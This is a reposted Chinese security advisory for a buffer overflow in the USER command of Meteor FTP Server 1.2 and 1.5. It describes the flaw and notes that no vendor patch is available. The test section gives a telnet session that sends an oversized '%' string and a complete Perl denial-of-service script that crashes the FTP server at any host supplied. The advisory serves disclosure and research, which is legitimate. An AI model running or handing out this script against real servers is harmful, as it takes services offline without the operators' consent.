Meteor FTP Server USER命令内存破坏漏洞

2008-04-10 03:04:15来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Meteor FTP Server USER命令内存破坏漏洞

发布日期:2003-08-08
更新日期:2005-05-25

受影响系统:
MeteorSoft Meteor FTP 1.2
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
MeteorSoft Meteor FTP 1.5
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
描述:
BUGTRAQ ID: 8376

Meteor FTP是一款使用在Windows下的FTP服务程序。

Meteor FTP的USER命令缺少充分的缓冲区边界检查,远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击,精心提交字符串数据可能以FTP进程权限在系统上执行任意指令。

通过连接Meteor FTP服务程序,发送包含超长字符串作为参数的USER命令,可使FTP服务崩溃,精心构建用户名数据可能以FTP进程权限在系统上执行任意指令。

如果以恰当的参数发布PASS和PORT命令的话,内存破坏还可能导致缓冲区溢出。

<*来源:Zee (zerash@evicted.org)
Auston J (Anix44@gmail.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106045414403076&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Zee (zerash@evicted.org)提供了如下测试方法:

root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.

#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org

use Net::FTP;
$host = $ARGV[0];

if("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
die("Usage : ./meteorftpdos <host\/ip>\n");
} else {

print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n");
print("Attempting to exploit the ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'); $ftp->quit;
print("Success!\n");
}

建议:
厂商补丁:

MeteorSoft
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://66.235.19.241/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:phpATM任意PHP代码包含漏洞

下一篇:Ipswitch IMail IMAP SELECT命令拒绝服务漏洞